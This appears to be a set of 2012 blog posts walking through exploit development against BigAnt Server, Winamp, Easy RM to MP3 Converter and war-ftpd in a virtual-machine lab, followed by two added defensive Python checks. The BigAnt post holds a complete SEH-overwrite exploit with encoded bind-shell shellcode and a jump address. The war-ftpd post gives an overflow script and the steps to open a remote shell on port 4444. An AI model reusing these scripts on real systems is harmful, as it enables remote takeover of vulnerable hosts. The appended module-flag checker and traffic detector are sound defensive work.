Friday, 28 September 2012

Exploit BigAnt Server

1. Install BigAnt Server and OllyDbg on Windows inside VirtualBox.
2. Create the fuzzer file; the author named it "bigant.py". Its content:

#!/usr/bin/python
# Python 2 script: sends one oversized "USV" command to BigAnt Server
import socket
target_address="192.168.56.101"   # IP of the Windows VM running BigAnt
target_port=6660                  # BigAnt Server listening port
buffer= "USV "+ "\x41" * 2500 + "\r\n\r\n"   # command, 2500 'A' bytes, request terminator
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()



3. Run BigAnt, then OllyDbg (attach to BigAnt and let it run). From Backtrack, run the fuzzer.

This is the result in the SEH chain (screenshot in the original post).
Then press Shift+F9 to pass the exception to the program, which sends execution to the data in the SEH chain.
And then, how do we know where the data buffer is in memory? Right-click the row in the stack window and choose "Follow in Dump".

4. Find a "POP, POP, RETN" address.
Copy the file vbajet32.dll from Windows and paste it into the "tmp" folder on Backtrack.

Next, in OllyDbg click View - Executable modules, then Search for - Sequence of commands,

and the matching instructions appear (screenshot in the original post).
Once the search finishes, the address is found.
5. Find the offset that overwrites SEH.
Edit the file "bigantfuzzer.py" to become:
#!/usr/bin/python
# Python 2: same fuzzer, but the 'A' bytes are replaced by a cyclic pattern
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="*************"+"\r\n\r\n"   # ***** = the pattern produced by pattern_create
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()

Note: ***** is the output of pattern_create (the cyclic pattern used to find the offset).
Then run BigAnt and OllyDbg, fuzz again, and this is the result (screenshot in the original post):
a value of 966 bytes is required to reach the SEH handler.

6. Edit the file "BigAntFuzzer.py" so that it becomes:

#!/usr/bin/python
# Python 2: check where the marker bytes land relative to the SEH record
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="\xCC\xCC\xCC\xCC"             # four INT3 bytes as the first marker
buffer+="\x41\x41\x41\x41"             # four 'A' bytes as the second marker
buffer+="\x90" * (2504-len(buffer))    # NOP filler up to 2504 bytes
buffer+=""
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


Run BigAnt and OllyDbg; once the fuzzer has run, check the SEH chain. This is the result (screenshot in the original post).
Press Shift+F9, and this is the result (screenshot in the original post).

Below is the dump window showing the buffer (screenshot in the original post).

7. Make the shellcode.
First make sure there are no "bad characters" in it.

Checking for bad characters:
#!/usr/bin/python
# Python 2: send a candidate byte sequence and inspect which bytes survive in memory
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "

buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90" * (2504-len(buffer))
buffer+="***********"  # row 1 of the generated payload (the bytes under test)
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


Check the bad-character result this way:
run BigAnt and OllyDbg and fuzz. If the SEH chain does not show "vbajet32.dll", something is wrong; otherwise it is fine. If nothing is wrong, edit the file "bigantfuzzer.py" and add the generated payload, for example:


#!/usr/bin/python
# Python 2: final layout for the BigAnt "USV" SEH overwrite
import socket
target_address="192.168.56.101"
target_port=6660
buffer= "USV "
buffer+= "\x90" * 962              # NOP filler up to the SEH record (966 bytes including "USV ")
buffer+= "\xeb\x06\x90\x90"        # next SEH: short jump 6 bytes forward, over the handler address
buffer+= "\x6A\x19\x9A\x0F"        # SEH handler: the POP POP RETN address in vbajet32.dll (little-endian)
buffer+= "\x90" * 16               # NOP pad in front of the shellcode
# generated payload (encoded shellcode) from the previous step:
buffer+= "\xbe\x1f\x10\xd7\xf0\x29\xc9\xb1\x51\xdb\xc1\xd9\x74\x24\xf4\x5a"
buffer+= "\x31\x72\x0e\x83\xea\xfc\x03\x6d\x1a\x35\x05\x6d\x70\x52\xab\x65"
buffer+="\x7c\x5b\xcb\x8a\x1f\x2f\x58\x50\xc4\xa4\xe4\xa4\x8f\xc7\xe3\xac"
buffer+="\x8e\xd8\x67\x03\x89\xad\x27\xbb\xa8\x5a\x9e\x30\x9e\x17\x21\xa8"
buffer+="\xee\xe7\xba\x98\x95\x28\xc8\xe7\x54\x62\x3c\xe6\x94\x98\xcb\xd3"
buffer+="\x4c\x7b\x1c\x56\x88\x08\x03\xbc\x53\xe4\xda\x37\x5f\xb1\xa9\x18"
buffer+="\x7c\x44\x45\xa5\x50\xcd\x10\xc5\x8c\xcd\x43\xd6\xfc\x36\xe7\x53"
buffer+="\xbd\xf8\x63\x23\x4e\x72\x03\xbf\xe3\x0f\xa4\xb7\xa5\x67\xab\x89"
buffer+="\x57\x94\xe3\xea\xbe\x02\x57\x72\x57\xf8\x65\x12\xd0\x8d\xbb\xbd"
buffer+="\x4a\x8d\x6c\x29\xb8\x9c\x71\x92\x6e\xa0\x5c\xbb\x07\xbb\x07\xc2"
buffer+="\xf5\x4c\xca\x91\x6f\x4f\x35\xc9\x18\x96\xc0\x1c\x75\x7f\x2c\x08"
buffer+="\xd5\xd3\x81\xe7\x89\x90\x76\x44\x7d\xe8\xa9\x2c\xe9\x07\x16\xd6"
buffer+="\xba\xae\x47\x83\x55\x15\x9d\xdb\x62\x02\x5d\xcd\x07\xbd\xf0\xa4"
buffer+="\x28\x6d\x9a\xe2\x7a\xa0\xb2\xbd\x7b\x6b\x17\x14\x7b\x44\xf0\x73"
buffer+="\xca\xe3\x48\x2c\x32\x3d\x1a\x86\x98\x97\x64\xf6\xb2\x70\x7c\x8f"
buffer+="\x72\xf9\xd5\x90\xad\xaf\x26\xbe\x34\x3a\xbd\x58\xd1\xd9\x50\x2d"
buffer+="\xc4\x74\xfb\x74\x2e\x45\x72\x61\x5a\x11\x0c\x8f\xaa\x59\xfd\xe5"
buffer+="\x33\x1b\x2f\x07\x89\xb0\xbc\x7a\x74\xf1\x69\x2f\x22\x69\x1c\xd1"
buffer+="\x86\x7c\x1f\x58\xad\x7f\x09\xf9\x7a\xd2\xe7\xac\xd5\xb8\x06\x1f"
buffer+="\x87\x69\x58\x60\xf7\xfa\xf7\x47\xfd\x34\x54\x88\x28\xa2\xa4\x89"
buffer+="\xe2\xcc\x8b\xfe\x5a\xcf\xaf\xc4\x01\xd0\x66\x96\x36\xfe\xef\x68"
buffer+="\x11\x1d\x9c\xc7\x5e\x34\x9c\x37"

buffer+= "\x90" * (2054-len(buffer))   # NOP filler up to the total length
buffer+= "\r\n\r\n"                    # request terminator
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(buffer)
print("yes")
sock.close()


8. Finally, run BigAnt, run the fuzzer, and then connect with telnet.
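The POP POP RETN address in step 4 is only usable because vbajet32.dll is loaded without ASLR and without SafeSEH protection, so a defender auditing an install should look for modules like that. The following is an added example, not code from this post: it reads the DllCharacteristics word of a PE file and lists the ASLR/DEP/NO_SEH flags that are missing (a complete SafeSEH check would also need the load config directory, which is not parsed here); make_pe builds a constructed minimal PE32 header so the check can be demonstrated offline.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040   # image can be relocated (ASLR)
NX_COMPAT    = 0x0100   # image is DEP compatible
NO_SEH       = 0x0400   # image registers no SEH handlers; handlers inside it are refused

def dll_characteristics(pe_bytes):
    """Return the DllCharacteristics field of a PE32/PE32+ image."""
    if pe_bytes[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe_bytes, 0x3C)[0]
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20            # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", pe_bytes, opt)[0]
    if magic not in (0x10B, 0x20B):    # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics sits at offset 70 of the optional header in both formats
    return struct.unpack_from("<H", pe_bytes, opt + 70)[0]

def mitigation_gaps(pe_bytes):
    """List the mitigations a module lacks (an empty list means all three are set)."""
    flags = dll_characteristics(pe_bytes)
    wanted = (("ASLR", DYNAMIC_BASE), ("DEP", NX_COMPAT), ("NO_SEH", NO_SEH))
    return [name for name, bit in wanted if not flags & bit]

def make_pe(flags):
    """Constructed minimal PE32 header (not a real DLL) carrying the given flags."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                  # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)    # i386 DLL, 224-byte optional header
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<H", opt, 70, flags)                            # DllCharacteristics
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as f:        # e.g. a copy of vbajet32.dll
        print(mitigation_gaps(f.read()))
```

Run it against every module the product loads; a module that reports all three gaps is the kind of module step 4 searches for, and replacing or rebuilding it with /DYNAMICBASE and /SAFESEH removes that option.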


Wednesday, 26 September 2012

Make Winamp Crash

Steps:

1. Create a script with the file name "fuzzerwinamp.py".
2. Type the script as in the example below it.
3. Run the file "fuzzerwinamp.py".
4. After running it, copy the generated file and paste it on the Windows VM in VirtualBox into the folder "C:\Program Files\Winamp\Skins\Big Bento".
5. Run the installed Winamp, right-click the Winamp toolbar, choose Skins and click Big Bento.
6. A Winamp crash warning appears.

Monday, 24 September 2012

Fuzzing EasyRMtoMP3Converter

1. Install EasyRMtoMP3Converter on your Windows VM in VirtualBox.
2. Create a fuzzing script named "fuzzereasy.py".
3. After creating the script, test it against the program under OllyDbg in VirtualBox; you can then see the value of the EIP register.
4. Create a pattern offset (cyclic pattern).
5. Put the pattern into the script fuzzereasy.py, then run it again under OllyDbg.
6. Then use the offset you found to control the value saved into EIP; the EIP register will show the marker value DEADBEEF in OllyDbg.
7. Next, find a "JMP ESP": View - Search for - Command, type "JMP ESP". After finding JMP ESP, put its address into fuzzereasy.py.
8. Open "msfweb":
open a browser and go to "127.0.0.1:55555". Choose Payloads and click Windows bind shell. Fill in the options: Restricted Characters "0x00 0x0a 0x0d 0x04 0x40", select the encoder "shikata_ga_nai" and click the Generate Payload button.

This is the generated payload (screenshot in the original post).
Combine the generated payload with the file "fuzzereasy.py".
This is the final result (screenshot in the original post).


Monday, 17 September 2012

Buffer Overflow

1. Here I use the software war-ftpd and OllyDbg, on Windows in VirtualBox.
2. Type ping "ip-target" and then nc "ip-target".
3. Run war-ftpd and OllyDbg in VirtualBox.

4. To send more than 1000 bytes of data, run the command (shown in the original post).
5. The result of the command above (screenshot in the original post).
6. Run war-ftpd, then OllyDbg, then execute fuzzer.py in the terminal; if OllyDbg shows a crash, it succeeded, and you can see the EIP register.
7. To exploit this application, simply fill in the values for ESP and EIP.
8. Place the payload into the stack:
#!/usr/bin/python
# Python 2: war-ftpd USER overflow test; 485 NOP bytes, then DEADBEEF as the EIP marker
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x90" * 485                      # NOP filler up to the saved return address
buffer+= "\xEF\xBE\xAD\xDE"                # 0xDEADBEEF (little-endian) should show up in EIP
buffer+= "\x90" * (493-len(buffer))        # pad to 493 bytes
buffer+= "\xCC" * (1000 -len(buffer))      # INT3 bytes fill the rest up to 1000 bytes
s.connect (('192.168.56.101',21))          # war-ftpd in the Windows VM
data=s.recv(1204)                          # read the FTP banner
print ("Sending evil data via USER command ...")
s.send ('USER '+buffer+'\r\n')             # FTP command lines end with CRLF
data = s.recv (1204)
s.send ('PASS PASSWORD'+'\r\n')
s.close()
print("Finish")

This is the result (screenshot in the original post).
9. To find JMP ESP, click View and choose the Executable modules submenu; this is the result (screenshot in the original post).

Then search for the command by typing "JMP ESP":

10. The result, customised with the JMP ESP address (screenshot in the original post).
11. Open a browser and go to "127.0.0.1:55555".

Choose Payloads and search for the payload type "windows shell bind tcp".
Fill in the configuration and click "Generate payloads".
This is the result of "Generate payloads" (screenshot in the original post).

12. Open the terminal again and copy the result of "Generate payload" into the script,

save and exit.

13. Open the war-ftpd application and put it online. After it is online, open a terminal and run fuzzer.py. If it succeeds, run telnet: "telnet 192.168.56.101 4444".
Congratulations!!!
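Both the BigAnt "USV" fuzzer (step 2 of the first post: port 6660, SEH record reached at 966 bytes) and the war-ftpd "USER" overflow above (port 21, DEADBEEF marker at byte 485) send a single text-protocol command whose argument is far longer than any real client would produce. Added example, not from the original posts: a Python check that parses the first request line of a captured session and flags oversized arguments, NOP sleds and mostly non-printable data. The length limits, the port-to-command table and the sample sessions are constructed for this demo.

```python
import re

# Per-service limit on the argument of one request line (constructed for the demo:
# the posts needed 966 bytes for BigAnt's USV and ~1000 bytes for war-ftpd's USER,
# so a legitimate argument should be far shorter than these limits)
MAX_ARG_LEN = {
    (6660, "USV"): 512,   # BigAnt Server, SEH handler overwritten at offset 966
    (21, "USER"): 128,    # war-ftpd, EIP marker landed at byte 485
}
NOP_SLED = re.compile(rb"\x90{16,}")   # 16 or more consecutive x86 NOP bytes

def inspect_command(port, payload):
    """Return a list of findings for the first request line of one session."""
    findings = []
    line = payload.split(b"\r\n", 1)[0]            # both services end the line with CRLF
    parts = line.split(b" ", 1)
    cmd = parts[0].decode("ascii", "replace").upper()
    arg = parts[1] if len(parts) > 1 else b""
    limit = MAX_ARG_LEN.get((port, cmd))
    if limit is None:
        return findings                            # not a service/command this check covers
    if len(arg) > limit:
        findings.append("%s argument is %d bytes (limit %d)" % (cmd, len(arg), limit))
    if NOP_SLED.search(arg):
        findings.append("NOP sled (run of 0x90) inside a text-protocol argument")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint and nonprint * 4 > len(arg):       # more than a quarter non-printable
        findings.append("%d non-printable bytes in %s argument" % (nonprint, cmd))
    return findings

# Constructed sample sessions (port, raw client request); not captures from the posts
SAMPLE_SESSIONS = [
    (6660, b"USV alice\r\n\r\n"),                                  # normal BigAnt login
    (6660, b"USV " + b"A" * 2500 + b"\r\n\r\n"),                   # shape of the step 2 fuzzer
    (21, b"USER anonymous\r\n"),                                   # normal FTP login
    (21, b"USER " + b"\x90" * 485 + b"\xef\xbe\xad\xde" + b"\xcc" * 100 + b"\r\n"),
]

def scan_sessions(sessions=SAMPLE_SESSIONS):
    """Return [(port, findings)] for every session that produced a finding."""
    alerts = []
    for port, request in sessions:
        findings = inspect_command(port, request)
        if findings:
            alerts.append((port, findings))
    return alerts
```

The same check applies to any line-oriented service: add a (port, command) entry with a limit derived from what real clients send, and feed it the first line of each captured session.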